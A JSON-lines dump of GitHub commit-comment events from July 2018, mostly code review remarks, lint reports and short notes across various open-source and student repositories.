{"id":"8000335327","type":"CommitCommentEvent","actor":{"login":"TimurhanKocabas"},"repo":{"name":"TimurhanKocabas/Victory.UserManagement"},"payload":{"comment":{"id":29792781,"position":null,"line":null,"path":null,"commit_id":"a998df2039c31a9452c0c1be4a84bd50df099d92","created_at":"2018-07-22T14:47:40Z","updated_at":"2018-07-22T14:47:40Z","author_association":"OWNER","body":"thanks for sample get method. we should change DI Configuration  for Data layer More generic way. (thumbs up) "}},"created_at":"2018-07-22T14:47:40Z"}
{"id":"8000335952","type":"CommitCommentEvent","actor":{"login":"simple-lab"},"repo":{"name":"simple-lab/simple-mark-editor"},"payload":{"comment":{"id":29792784,"position":null,"line":null,"path":null,"commit_id":"86dae5c302035c7530c09552c78c6b6ef1029624","created_at":"2018-07-22T14:48:08Z","updated_at":"2018-07-22T14:48:08Z","author_association":"OWNER","body":"'#' 글머리가 h1 태그라는 것을 명시"}},"created_at":"2018-07-22T14:48:08Z"}
{"id":"8000336887","type":"CommitCommentEvent","actor":{"login":"NuLogicSystems"},"repo":{"name":"TheAssassin/AppImageLauncher"},"payload":{"comment":{"id":29792786,"position":null,"line":null,"path":null,"commit_id":"c3e1b274c65f7ecf31e784cf1664d007dd9ff1a1","created_at":"2018-07-22T14:48:47Z","updated_at":"2018-07-22T14:48:47Z","author_association":"NONE","body":"Done: https://github.com/TheAssassin/AppImageLauncher/issues/60"}},"created_at":"2018-07-22T14:48:47Z"}
{"id":"8000337256","type":"CommitCommentEvent","actor":{"login":"reneaicisneros"},"repo":{"name":"LineageOS/android"},"payload":{"comment":{"id":29792787,"position":null,"line":null,"path":null,"commit_id":"aac32e177d86e305b76badadee589d8409f7f4d3","created_at":"2018-07-22T14:49:02Z","updated_at":"2018-07-22T14:49:02Z","author_association":"NONE","body":",~~~~ "}},"created_at":"2018-07-22T14:49:02Z"}
{"id":"8000338112","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29792788,"position":5,"line":117,"path":"code/drasil-lang/Language/Drasil/Document.hs","commit_id":"c775812d0e354286d65706b405e7bbb5076b08d2","created_at":"2018-07-22T14:49:36Z","updated_at":"2018-07-22T14:49:36Z","author_association":"OWNER","body":"You could define this as just \r\n```haskell\r\naccessContents = ctype\r\n```"}},"created_at":"2018-07-22T14:49:36Z"}
{"id":"8000338303","type":"CommitCommentEvent","actor":{"login":"mrfade"},"repo":{"name":"rg3/youtube-dl"},"payload":{"comment":{"id":29792789,"position":360,"line":235,"path":"youtube_dl/extractor/puhutv.py","commit_id":"8fd2a7be373a29b9bea491f952f14315a90c2f3a","created_at":"2018-07-22T14:49:45Z","updated_at":"2018-07-22T14:49:45Z","author_association":"CONTRIBUTOR","body":"After I tested this code, I realized that I was not right because I had recognized urljoin function wrong. Sorry for my fault"}},"created_at":"2018-07-22T14:49:45Z"}
{"id":"8000340982","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29792795,"position":6,"line":22,"path":"code/drasil-lang/Language/Drasil/Printing/LayoutObj.hs","commit_id":"c775812d0e354286d65706b405e7bbb5076b08d2","created_at":"2018-07-22T14:51:29Z","updated_at":"2018-07-22T14:51:29Z","author_association":"OWNER","body":"I think that having all `Paragraph` being labelled (same with all `EqnBlock` and `List`, but not so for `Bib`) seems like overkill."}},"created_at":"2018-07-22T14:51:29Z"}
{"id":"8000341667","type":"CommitCommentEvent","actor":{"login":"lenak25"},"repo":{"name":"enigmampc/catalyst"},"payload":{"comment":{"id":29792798,"position":null,"line":null,"path":null,"commit_id":"1f83c45b277d2f5122abfcd53d0b9a89df069e77","created_at":"2018-07-22T14:51:56Z","updated_at":"2018-07-22T14:51:56Z","author_association":"COLLABORATOR","body":"Thanks @sam31415 !\r\n\r\nWe've updated the`set_slippage` function, as it was required to align with this commit and release 0.5.18\r\nWe've taken your comments into consideration and made sure users will know about this change."}},"created_at":"2018-07-22T14:51:56Z"}
{"id":"8000342114","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"denio-rus/BlackJack"},"payload":{"comment":{"id":29792799,"position":14,"line":14,"path":"deck.rb","commit_id":"ad1062e222265356bd0efa76199aee6ac2cf3fe3","created_at":"2018-07-22T14:52:13Z","updated_at":"2018-07-22T14:52:13Z","author_association":"NONE","body":"строки 12 - 14 лучше вынести в отдельный метод, который здесь вызвать\r\nкакой-нибудь \"криэейт дэк\" или еще что-то\r\n"}},"created_at":"2018-07-22T14:52:13Z"}
{"id":"8000343900","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"denio-rus/BlackJack"},"payload":{"comment":{"id":29792802,"position":15,"line":15,"path":"deck.rb","commit_id":"ad1062e222265356bd0efa76199aee6ac2cf3fe3","created_at":"2018-07-22T14:53:25Z","updated_at":"2018-07-22T14:53:25Z","author_association":"NONE","body":"можешь оставить здесь, но возможно логичней вызывать этот метод из управляющего кода\r\nсоздал колоду, в начале раунда перемешал"}},"created_at":"2018-07-22T14:53:25Z"}
{"id":"8000346902","type":"CommitCommentEvent","actor":{"login":"Necromaggus"},"repo":{"name":"Necromaggus/website"},"payload":{"comment":{"id":29792812,"position":1,"line":1,"path":"lipsum.txt","commit_id":"a91bdb09d1ef84e3f6e8df694204907f9df8cce0","created_at":"2018-07-22T14:55:26Z","updated_at":"2018-07-22T14:55:26Z","author_association":"OWNER","body":"### Ipsun text?\r\n\r\nYou are a man of culture."}},"created_at":"2018-07-22T14:55:26Z"}
{"id":"8000347409","type":"CommitCommentEvent","actor":{"login":"tomuncle2"},"repo":{"name":"tomuncle2/myfristproject"},"payload":{"comment":{"id":29792813,"position":null,"line":null,"path":null,"commit_id":"ed4773877746d76de6f76ac958f3dbb66f1f20b8","created_at":"2018-07-22T14:55:47Z","updated_at":"2018-07-22T14:55:47Z","author_association":"OWNER","body":"222"}},"created_at":"2018-07-22T14:55:47Z"}
{"id":"8000347482","type":"CommitCommentEvent","actor":{"login":"lizpunct"},"repo":{"name":"lizpunct/Khaled-Ipsum"},"payload":{"comment":{"id":29792814,"position":69,"line":41,"path":"js/lion.js","commit_id":"01ee292265f392ff68519807d0fb249928557466","created_at":"2018-07-22T14:55:49Z","updated_at":"2018-07-22T14:55:49Z","author_association":"OWNER","body":". spellcheck\r\n. remove \"Congratulations, you played yourself\", not taking risks with HR"}},"created_at":"2018-07-22T14:55:49Z"}
{"id":"8000347646","type":"CommitCommentEvent","actor":{"login":"tomuncle2"},"repo":{"name":"tomuncle2/myfristproject"},"payload":{"comment":{"id":29792815,"position":null,"line":null,"path":null,"commit_id":"ed4773877746d76de6f76ac958f3dbb66f1f20b8","created_at":"2018-07-22T14:55:57Z","updated_at":"2018-07-22T14:55:57Z","author_association":"OWNER","body":"333"}},"created_at":"2018-07-22T14:55:57Z"}
{"id":"8000348052","type":"CommitCommentEvent","actor":{"login":"Dharani-abss"},"repo":{"name":"zeihng/hrt"},"payload":{"comment":{"id":29792818,"position":null,"line":null,"path":null,"commit_id":"717d1b404f5894b791bd8323e1f4c459cec37fed","created_at":"2018-07-22T14:56:12Z","updated_at":"2018-07-22T14:56:12Z","author_association":"NONE","body":"![](https://github.trello.services/images/mini-trello-icon.png) [GH - first shot](https://trello.com/c/vo0dQCjY/2-gh-first-shot)"}},"created_at":"2018-07-22T14:56:12Z"}
{"id":"8000349693","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29792819,"position":null,"line":null,"path":null,"commit_id":"ed168e9ba1d777fb4629f98df536b34b9dedd9f9","created_at":"2018-07-22T14:57:20Z","updated_at":"2018-07-22T14:57:20Z","author_association":"OWNER","body":"Did you mean to check-in `untitled.hs` ?"}},"created_at":"2018-07-22T14:57:20Z"}
{"id":"8000350588","type":"CommitCommentEvent","actor":{"login":"rodolforg"},"repo":{"name":"fire/gdsqlite-native"},"payload":{"comment":{"id":29792820,"position":64,"line":130,"path":"src/gdsqlite.c","commit_id":"df915b3b5b7143a0108ddae961c98347fcb264ef","created_at":"2018-07-22T14:57:58Z","updated_at":"2018-07-22T14:57:58Z","author_association":"NONE","body":"I think you shouldn't make `db` a pointer, but a regular variable.\r\nAnd this memory allocation here is never freed."}},"created_at":"2018-07-22T14:57:58Z"}
{"id":"8000350691","type":"CommitCommentEvent","actor":{"login":"Necromaggus"},"repo":{"name":"Necromaggus/website"},"payload":{"comment":{"id":29792821,"position":null,"line":null,"path":null,"commit_id":"a91bdb09d1ef84e3f6e8df694204907f9df8cce0","created_at":"2018-07-22T14:58:02Z","updated_at":"2018-07-22T14:58:02Z","author_association":"OWNER","body":"### Ipsun text?\r\n\r\nYou are a __man__ of *culture*."}},"created_at":"2018-07-22T14:58:02Z"}
{"id":"8000354876","type":"CommitCommentEvent","actor":{"login":"Dharani-abss"},"repo":{"name":"zeihng/hrt"},"payload":{"comment":{"id":29792836,"position":null,"line":null,"path":null,"commit_id":"717d1b404f5894b791bd8323e1f4c459cec37fed","created_at":"2018-07-22T15:00:45Z","updated_at":"2018-07-22T15:00:45Z","author_association":"NONE","body":"![](https://github.trello.services/images/mini-trello-icon.png) [GH - first shot22](https://trello.com/c/vo0dQCjY/2-gh-first-shot)"}},"created_at":"2018-07-22T15:00:45Z"}
{"id":"8000356667","type":"CommitCommentEvent","actor":{"login":"ashutoshpith"},"repo":{"name":"ashutoshpith/Repair-api"},"payload":{"comment":{"id":29792840,"position":null,"line":null,"path":null,"commit_id":"aa7f931a42d61b57fad98981ce6b40b6aaa4b3cf","created_at":"2018-07-22T15:01:53Z","updated_at":"2018-07-22T15:01:53Z","author_association":"OWNER","body":"inital"}},"created_at":"2018-07-22T15:01:53Z"}
{"id":"8000356772","type":"CommitCommentEvent","actor":{"login":"typecampo"},"repo":{"name":"umuccmsc/todo"},"payload":{"comment":{"id":29792841,"position":null,"line":null,"path":null,"commit_id":"ecbeb0a344e8c60aac7f743e6987d24affea49f1","created_at":"2018-07-22T15:01:58Z","updated_at":"2018-07-22T15:01:58Z","author_association":"COLLABORATOR","body":"This is cool but be careful not to override bootstrap's style sheet. Alot of this is already built into the bootstrap css. Also the dir for this would be public/stylesheets."}},"created_at":"2018-07-22T15:01:58Z"}
{"id":"8000357341","type":"CommitCommentEvent","actor":{"login":"galegosimpatico"},"repo":{"name":"wesnoth/wesmere"},"payload":{"comment":{"id":29792843,"position":null,"line":null,"path":null,"commit_id":"a503a0ac178bea47f8ac7719d2671050b60973ac","created_at":"2018-07-22T15:02:19Z","updated_at":"2018-07-22T15:02:19Z","author_association":"NONE","body":"Good job...\r\n\r\nMaybe you already had there something you could use for the Facebook link clickable.\r\n\r\nIf I remember correctly, only with https://github.com/davewx7/aa/pull/4/commits/a2c2acbbc3a663b8c4ad052c282ffde98f6dae2b, no addition of any resource, and yet already rendered like:\r\n\r\n![screenshot](https://user-images.githubusercontent.com/3533348/36122386-6de170ca-1049-11e8-806a-d02afecc2b35.png)\r\n\r\n🤷‍♂️ \r\n"}},"created_at":"2018-07-22T15:02:19Z"}
{"id":"8000357895","type":"CommitCommentEvent","actor":{"login":"Cadair"},"repo":{"name":"astrofrog/baldrick"},"payload":{"comment":{"id":29792845,"position":5,"line":166,"path":"baldrick/plugins/github_towncrier_changelog.py","commit_id":"02f43246c35e29f8b821ef7fd9e422e99ed3caff","created_at":"2018-07-22T15:02:42Z","updated_at":"2018-07-22T15:02:42Z","author_association":"COLLABORATOR","body":"Ah. This should be overridden in PullRequest handler to default to this?"}},"created_at":"2018-07-22T15:02:42Z"}
{"id":"8000358719","type":"CommitCommentEvent","actor":{"login":"coler706"},"repo":{"name":"NovaMods/nova-renderer"},"payload":{"comment":{"id":29792846,"position":92,"line":155,"path":"mod/src/main/java/com/continuum/nova/mixin/gui/MixinGuiMainMenu.java","commit_id":"a9d278240e4f6c74dc7e363f2cc5ee1bada4a0dd","created_at":"2018-07-22T15:03:16Z","updated_at":"2018-07-22T15:03:16Z","author_association":"CONTRIBUTOR","body":"ok"}},"created_at":"2018-07-22T15:03:16Z"}
{"id":"8000358810","type":"CommitCommentEvent","actor":{"login":"rodolforg"},"repo":{"name":"fire/gdsqlite-native"},"payload":{"comment":{"id":29792847,"position":52,"line":122,"path":"src/gdsqlite.c","commit_id":"df915b3b5b7143a0108ddae961c98347fcb264ef","created_at":"2018-07-22T15:03:20Z","updated_at":"2018-07-22T15:03:20Z","author_association":"NONE","body":"So you decided to make SQLite only for in-memory databases?\r\nAnyway, you should check if first argument is really of expected type.\r\n`godot_variant_type GDAPI godot_variant_get_type(const godot_variant *p_v);`"}},"created_at":"2018-07-22T15:03:20Z"}
{"id":"8000359190","type":"CommitCommentEvent","actor":{"login":"gmaclennan"},"repo":{"name":"digidem/mapeo-server"},"payload":{"comment":{"id":29792848,"position":null,"line":null,"path":null,"commit_id":"743194f3654b5e99d7470bfcae82cfb60a3e64df","created_at":"2018-07-22T15:03:36Z","updated_at":"2018-07-22T15:03:36Z","author_association":"MEMBER","body":"@noffle this should work fine in my fork of safe-fs-blob-store.\r\n\r\nThe bug was here: https://github.com/noffle/safe-fs-blob-store/blob/90856d79da7a7c78397a42cce7c1ae5cc08b754b/index.js#L84\r\n\r\nYou were returning the transform stream rather than the write stream. It should be something like `return t.pipe(ws)`.\r\n\r\nI've added an explanation here: https://github.com/rvagg/through2/issues/91#issuecomment-406872979\r\n\r\nWe could safely reverse this, although I think this change actually makes it more readable."}},"created_at":"2018-07-22T15:03:36Z"}
{"id":"8000360863","type":"CommitCommentEvent","actor":{"login":"Dharani-abss"},"repo":{"name":"zeihng/hrt"},"payload":{"comment":{"id":29792851,"position":null,"line":null,"path":null,"commit_id":"717d1b404f5894b791bd8323e1f4c459cec37fed","created_at":"2018-07-22T15:04:42Z","updated_at":"2018-07-22T15:04:42Z","author_association":"NONE","body":"![](https://github.trello.services/images/mini-trello-icon.png) [GH - first shot](https://trello.com/c/vo0dQCjY/2-gh-first-shot)"}},"created_at":"2018-07-22T15:04:42Z"}
{"id":"8000361172","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Valentin0810/JD-2018-07-09"},"payload":{"comment":{"id":29792852,"position":23,"line":23,"path":"src/lesson4/Task1.java","commit_id":"6b184aa032479264d45d3b2f38ebdc7fdf6a3948","created_at":"2018-07-22T15:04:53Z","updated_at":"2018-07-22T15:04:53Z","author_association":"NONE","body":"сложность твоего алгоритма O(n^2), можно было за один проход решить по массиву (те за O(n))"}},"created_at":"2018-07-22T15:04:53Z"}
{"id":"8000361518","type":"CommitCommentEvent","actor":{"login":"VoyagerOne"},"repo":{"name":"locutus2/Stockfish"},"payload":{"comment":{"id":29792853,"position":null,"line":null,"path":null,"commit_id":"cd22184736ce4016089d00e616bbf1a4d1d9ee15","created_at":"2018-07-22T15:05:07Z","updated_at":"2018-07-22T15:05:07Z","author_association":"NONE","body":"+1 for this patch"}},"created_at":"2018-07-22T15:05:07Z"}
{"id":"8000361762","type":"CommitCommentEvent","actor":{"login":"arigayas"},"repo":{"name":"ryotayama/Hayaemon_Web"},"payload":{"comment":{"id":29792854,"position":null,"line":null,"path":null,"commit_id":"d1df39f2f1c251ee86559b88029b42c3f368140f","created_at":"2018-07-22T15:05:17Z","updated_at":"2018-07-22T15:05:17Z","author_association":"COLLABORATOR","body":"ありがとうございます。"}},"created_at":"2018-07-22T15:05:17Z"}
{"id":"8000362121","type":"CommitCommentEvent","actor":{"login":"DzianisMatveyenka"},"repo":{"name":"Valentin0810/JD-2018-07-09"},"payload":{"comment":{"id":29792855,"position":16,"line":16,"path":"src/lesson4/Task2.java","commit_id":"6b184aa032479264d45d3b2f38ebdc7fdf6a3948","created_at":"2018-07-22T15:05:32Z","updated_at":"2018-07-22T15:05:32Z","author_association":"NONE","body":"не забываем скобочки в конструкциях (for не исключение)"}},"created_at":"2018-07-22T15:05:32Z"}
{"id":"8000362695","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29792858,"position":null,"line":null,"path":null,"commit_id":"3a846f576b47d323672eda53581c7aec091da0a3","created_at":"2018-07-22T15:05:56Z","updated_at":"2018-07-22T15:05:56Z","author_association":"OWNER","body":"Nice. But why is the glassBR example calling `sortBy` itself? Wouldn't we want the infrastructure to do that?"}},"created_at":"2018-07-22T15:05:56Z"}
{"id":"8000363389","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29792859,"position":null,"line":null,"path":null,"commit_id":"7c94caf2ef987c789e0586e3e58e19137e327839","created_at":"2018-07-22T15:06:21Z","updated_at":"2018-07-22T15:06:21Z","author_association":"OWNER","body":"\"More changes\" is not a good log message to use..."}},"created_at":"2018-07-22T15:06:21Z"}
{"id":"8000363575","type":"CommitCommentEvent","actor":{"login":"rodolforg"},"repo":{"name":"fire/gdsqlite-native"},"payload":{"comment":{"id":29792861,"position":68,"line":134,"path":"src/gdsqlite.c","commit_id":"df915b3b5b7143a0108ddae961c98347fcb264ef","created_at":"2018-07-22T15:06:28Z","updated_at":"2018-07-22T15:06:28Z","author_association":"NONE","body":"Doubt: what if more than one DB is open at same time? Should this name \"godot.db\" be unique or is it useless?"}},"created_at":"2018-07-22T15:06:28Z"}
{"id":"8000363902","type":"CommitCommentEvent","actor":{"login":"nijel"},"repo":{"name":"GrahamDumpleton/weblate"},"payload":{"comment":{"id":29792863,"position":9,"line":48,"path":".s2i/action_hooks/setup","commit_id":"22df637d26f30f88ca251346343d665fa7f92777","created_at":"2018-07-22T15:06:42Z","updated_at":"2018-07-22T15:06:42Z","author_association":"NONE","body":"It might be better to just use [createadmin management command](https://docs.weblate.org/en/latest/admin/management.html#createadmin) and you don't have to care about internals then:\r\n\r\n```\r\npython manage.py createadmin \\\r\n    --username \"$DJANGO_ADMIN_USERNAME\" \\\r\n    --email \"$DJANGO_ADMIN_EMAIL\" \\\r\n    --password \"$DJANGO_ADMIN_PASSWORD\"\r\n```"}},"created_at":"2018-07-22T15:06:42Z"}
{"id":"8000366923","type":"CommitCommentEvent","actor":{"login":"eendroroy"},"repo":{"name":"eendroroy/alien"},"payload":{"comment":{"id":29792872,"position":null,"line":null,"path":null,"commit_id":"7f6bd2b6a6254b24c77985a1e875094e493918cc","created_at":"2018-07-22T15:08:41Z","updated_at":"2018-07-22T15:08:41Z","author_association":"OWNER","body":"I was not aware about it when I developed the theme. I did not go through the documentation properly. Thanks for the suggestion :)"}},"created_at":"2018-07-22T15:08:41Z"}
{"id":"8000368965","type":"CommitCommentEvent","actor":{"login":"drnextgis"},"repo":{"name":"OSGeo/gdal"},"payload":{"comment":{"id":29792875,"position":null,"line":null,"path":null,"commit_id":"76f3111b86f418851ad91f0ba339d671a6997fe2","created_at":"2018-07-22T15:10:06Z","updated_at":"2018-07-22T15:10:06Z","author_association":"NONE","body":"precise64 URL is still here:\r\n\r\nhttps://github.com/OSGeo/gdal/blob/c8fd0569c336ee6c0722ec5a9adfa63ed8281e51/Vagrantfile#L36"}},"created_at":"2018-07-22T15:10:06Z"}
{"id":"8000369704","type":"CommitCommentEvent","actor":{"login":"JacquesCarette"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":29792876,"position":null,"line":null,"path":null,"commit_id":"9331a6b40eb53a2c3703cc4f3449168169a2086d","created_at":"2018-07-22T15:10:33Z","updated_at":"2018-07-22T15:10:33Z","author_association":"CONTRIBUTOR","body":"That is certainly a nice simplification to have -- but I don't understand why preventing that particular idx from becoming 0 is a 'fix'. It feels like a patch that hides the true bug from being triggered."}},"created_at":"2018-07-22T15:10:33Z"}
{"id":"8000370017","type":"CommitCommentEvent","actor":{"login":"pSub"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29792877,"position":null,"line":null,"path":null,"commit_id":"27af1633a497c49308bd008d510b0388b723656d","created_at":"2018-07-22T15:10:44Z","updated_at":"2018-07-22T15:10:44Z","author_association":"MEMBER","body":"Oh, I am sorry. Seems I forgot to test evaluation in that case. Thanks for fixing this."}},"created_at":"2018-07-22T15:10:44Z"}
{"id":"8000370620","type":"CommitCommentEvent","actor":{"login":"tarek360"},"repo":{"name":"tarek360/emptyapp"},"payload":{"comment":{"id":29792878,"position":null,"line":null,"path":null,"commit_id":"7998d62f6bdb3866fa2c984d2e90fd52a43c2a1c","created_at":"2018-07-22T15:11:09Z","updated_at":"2018-07-22T15:11:09Z","author_association":"OWNER","body":"### ----------------------------- Detekt Issues ☠️ -----------------------------\n- [LongParameterList - 9/7 - [myFunc]](https://github.com/tarek360/emptyapp/blob/7998d62f6bdb3866fa2c984d2e90fd52a43c2a1c/app/src/main/kotlin/com/example/empty/emptyapp/KotlinPresenter.kt#L17)\n- [EmptyWhenBlock - [myFunc]](https://github.com/tarek360/emptyapp/blob/7998d62f6bdb3866fa2c984d2e90fd52a43c2a1c/app/src/main/kotlin/com/example/empty/emptyapp/KotlinPresenter.kt#L19)\n- [EmptyIfBlock - [createPresenter]](https://github.com/tarek360/emptyapp/blob/7998d62f6bdb3866fa2c984d2e90fd52a43c2a1c/app/src/main/kotlin/com/example/empty/emptyapp/Factory.kt#L9)\n- [EmptyIfBlock - [createPresenter]](https://github.com/tarek360/emptyapp/blob/7998d62f6bdb3866fa2c984d2e90fd52a43c2a1c/app/src/main/kotlin/com/example/empty/emptyapp/Factory.kt#L11)\n- [EmptyElseBlock - [createPresenter]](https://github.com/tarek360/emptyapp/blob/7998d62f6bdb3866fa2c984d2e90fd52a43c2a1c/app/src/main/kotlin/com/example/empty/emptyapp/Factory.kt#L13)\n- [MagicNumber - [num]](https://github.com/tarek360/emptyapp/blob/7998d62f6bdb3866fa2c984d2e90fd52a43c2a1c/app/src/main/kotlin/com/example/empty/emptyapp/KotlinPresenter.kt#L15)\n- [MagicNumber - [x]](https://github.com/tarek360/emptyapp/blob/7998d62f6bdb3866fa2c984d2e90fd52a43c2a1c/app/src/main/kotlin/com/example/empty/emptyapp/Factory.kt#L7)\n- [MagicNumber - [createPresenter]](https://github.com/tarek360/emptyapp/blob/7998d62f6bdb3866fa2c984d2e90fd52a43c2a1c/app/src/main/kotlin/com/example/empty/emptyapp/Factory.kt#L11)\n- [MagicNumber - [x]](https://github.com/tarek360/emptyapp/blob/7998d62f6bdb3866fa2c984d2e90fd52a43c2a1c/buildSrc/src/main/kotlin/com/example/gradle/GithubCommitCommenter.kt#L16)\n"}},"created_at":"2018-07-22T15:11:09Z"}
{"id":"8000370916","type":"CommitCommentEvent","actor":{"login":"dychomon"},"repo":{"name":"dychomon/tietopythontraining-basic"},"payload":{"comment":{"id":29792879,"position":null,"line":null,"path":null,"commit_id":"ab8332bf55ed14c2a64a493ccc51af65badacdbb","created_at":"2018-07-22T15:11:19Z","updated_at":"2018-07-22T15:11:19Z","author_association":"OWNER","body":"@kuszcjan lesson_13"}},"created_at":"2018-07-22T15:11:19Z"}
{"id":"8000370984","type":"CommitCommentEvent","actor":{"login":"S191617"},"repo":{"name":"MDCGP105-1718/portfolio-S191617"},"payload":{"comment":{"id":29792881,"position":null,"line":null,"path":null,"commit_id":"783336385d4e3f24c107f89cfe44d0df23e11aa6","created_at":"2018-07-22T15:11:21Z","updated_at":"2018-07-22T15:11:21Z","author_association":"COLLABORATOR","body":"First steps with python "}},"created_at":"2018-07-22T15:11:21Z"}
{"id":"8000372359","type":"CommitCommentEvent","actor":{"login":"SaintPeter"},"repo":{"name":"joshuaaguilar20/ReactCalculator1"},"payload":{"comment":{"id":29792883,"position":45,"line":16,"path":"src/app.js","commit_id":"cb7ac96b0dfb1d08262c3b3532ac1216221b481c","created_at":"2018-07-22T15:12:11Z","updated_at":"2018-07-22T15:12:11Z","author_association":"NONE","body":"This and the following 3 lines should be inside the code block which currently ends at line 15.  Not sure how this even works at all."}},"created_at":"2018-07-22T15:12:11Z"}
{"id":"8000372597","type":"CommitCommentEvent","actor":{"login":"tarek360"},"repo":{"name":"tarek360/emptyapp"},"payload":{"comment":{"id":29792884,"position":null,"line":null,"path":null,"commit_id":"b2de3781c4382ac73b2d5a998114d1fda774caf3","created_at":"2018-07-22T15:12:21Z","updated_at":"2018-07-22T15:12:21Z","author_association":"OWNER","body":"### ----------------------------- Detekt Issues ☠️ -----------------------------\n- [LongParameterList - 9/7 - [myFunc]](https://github.com/tarek360/emptyapp/blob/b2de3781c4382ac73b2d5a998114d1fda774caf3/app/src/main/kotlin/com/example/empty/emptyapp/KotlinPresenter.kt#L17)\n- [EmptyWhenBlock - [myFunc]](https://github.com/tarek360/emptyapp/blob/b2de3781c4382ac73b2d5a998114d1fda774caf3/app/src/main/kotlin/com/example/empty/emptyapp/KotlinPresenter.kt#L19)\n- [EmptyIfBlock - [createPresenter]](https://github.com/tarek360/emptyapp/blob/b2de3781c4382ac73b2d5a998114d1fda774caf3/app/src/main/kotlin/com/example/empty/emptyapp/Factory.kt#L9)\n- [EmptyIfBlock - [createPresenter]](https://github.com/tarek360/emptyapp/blob/b2de3781c4382ac73b2d5a998114d1fda774caf3/app/src/main/kotlin/com/example/empty/emptyapp/Factory.kt#L11)\n- [EmptyElseBlock - [createPresenter]](https://github.com/tarek360/emptyapp/blob/b2de3781c4382ac73b2d5a998114d1fda774caf3/app/src/main/kotlin/com/example/empty/emptyapp/Factory.kt#L13)\n- [MagicNumber - [num]](https://github.com/tarek360/emptyapp/blob/b2de3781c4382ac73b2d5a998114d1fda774caf3/app/src/main/kotlin/com/example/empty/emptyapp/KotlinPresenter.kt#L15)\n- [MagicNumber - [x]](https://github.com/tarek360/emptyapp/blob/b2de3781c4382ac73b2d5a998114d1fda774caf3/app/src/main/kotlin/com/example/empty/emptyapp/Factory.kt#L7)\n- [MagicNumber - [createPresenter]](https://github.com/tarek360/emptyapp/blob/b2de3781c4382ac73b2d5a998114d1fda774caf3/app/src/main/kotlin/com/example/empty/emptyapp/Factory.kt#L11)\n- [MagicNumber - [x]](https://github.com/tarek360/emptyapp/blob/b2de3781c4382ac73b2d5a998114d1fda774caf3/buildSrc/src/main/kotlin/com/example/gradle/GithubCommitCommenter.kt#L16)\n"}},"created_at":"2018-07-22T15:12:21Z"}
{"id":"8000373747","type":"CommitCommentEvent","actor":{"login":"MengGodKing"},"repo":{"name":"MengGodKing/bos-parent"},"payload":{"comment":{"id":29792886,"position":null,"line":null,"path":null,"commit_id":"91daad6b0956a1afd90a0d32807a52eda158e4ed","created_at":"2018-07-22T15:13:06Z","updated_at":"2018-07-22T15:13:06Z","author_association":"OWNER","body":"此项目由于是基于maven所以创建，在很多时候需要先手动将maven打包发布一下，否则会出现编译异常（代码上面看不出来异常信息，所以一开始用这个十分纠结）"}},"created_at":"2018-07-22T15:13:06Z"}
{"id":"8000375419","type":"CommitCommentEvent","actor":{"login":"SaintPeter"},"repo":{"name":"joshuaaguilar20/ReactCalculator1"},"payload":{"comment":{"id":29792890,"position":38,"line":10,"path":"src/app.js","commit_id":"cb7ac96b0dfb1d08262c3b3532ac1216221b481c","created_at":"2018-07-22T15:14:12Z","updated_at":"2018-07-22T15:14:12Z","author_association":"NONE","body":"Could we do this by calling the \"clearDisplay\" function?\r\nThat function might need to be modified, or a separate \"clearSettings\" function created, but it may help with the \"Don't Repeat Yourself\" principle.."}},"created_at":"2018-07-22T15:14:12Z"}
{"id":"8000375468","type":"CommitCommentEvent","actor":{"login":"josh-"},"repo":{"name":"unihackhq/handbook"},"payload":{"comment":{"id":29792891,"position":14,"line":14,"path":"docs/melbourne/event-information/communication.md","commit_id":"3eb2579744a32834960b6ec493f9518a0b33b75a","created_at":"2018-07-22T15:14:14Z","updated_at":"2018-07-22T15:14:14Z","author_association":"MEMBER","body":"@dsykesturner and @kochie can you please let us know when we have App Store & Google Play links so they can be added in here?"}},"created_at":"2018-07-22T15:14:14Z"}
{"id":"8000376791","type":"CommitCommentEvent","actor":{"login":"zenmumbler"},"repo":{"name":"whatwg/streams"},"payload":{"comment":{"id":29792895,"position":null,"line":null,"path":null,"commit_id":"a27a1fd0f8640d6054e0cbc8b6d7f5464dd096ab","created_at":"2018-07-22T15:15:06Z","updated_at":"2018-07-22T15:15:06Z","author_association":"NONE","body":"I created a PR for the WPT changing some asserts to use generic Object.hasOwnProperty calls on these objects. https://github.com/web-platform-tests/wpt/pull/12125"}},"created_at":"2018-07-22T15:15:06Z"}
{"id":"8000377717","type":"CommitCommentEvent","actor":{"login":"SaintPeter"},"repo":{"name":"joshuaaguilar20/ReactCalculator1"},"payload":{"comment":{"id":29792898,"position":184,"line":46,"path":"src/app.js","commit_id":"cb7ac96b0dfb1d08262c3b3532ac1216221b481c","created_at":"2018-07-22T15:15:39Z","updated_at":"2018-07-22T15:15:39Z","author_association":"NONE","body":"This statement is repeated for almost every single case.  It should probably be moved down below the switch statement.  This will reduce your code length quite a bit."}},"created_at":"2018-07-22T15:15:39Z"}
{"id":"8000378520","type":"CommitCommentEvent","actor":{"login":"selbachgra"},"repo":{"name":"selbachgra/ome-pos"},"payload":{"comment":{"id":29792899,"position":null,"line":null,"path":null,"commit_id":"bd6c898d37048d48b904e383904f312f00e18421","created_at":"2018-07-22T15:16:10Z","updated_at":"2018-07-22T15:16:10Z","author_association":"OWNER","body":"commit logowania"}},"created_at":"2018-07-22T15:16:10Z"}
